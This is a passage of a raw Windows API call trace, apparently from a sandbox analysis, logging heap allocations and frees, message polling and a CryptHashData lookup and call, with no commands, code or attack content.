lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0206.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e78 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0206.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0206.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0206.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0206.493] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0206.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0206.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0206.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0206.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0206.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0206.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0206.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0206.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0206.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0206.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0206.496] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0206.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0206.497] CryptHashData (hHash=0xa87490, pbData=0x2e54e58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0206.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0206.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0206.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0206.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0206.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0206.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0206.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0206.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0206.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0206.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0206.500] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0206.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0206.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b90 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0206.500] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0206.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0206.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0206.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0206.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0206.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0206.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0206.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0206.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0206.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0206.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0206.501] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0206.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0206.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bf0 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0206.502] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0206.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0206.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0206.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 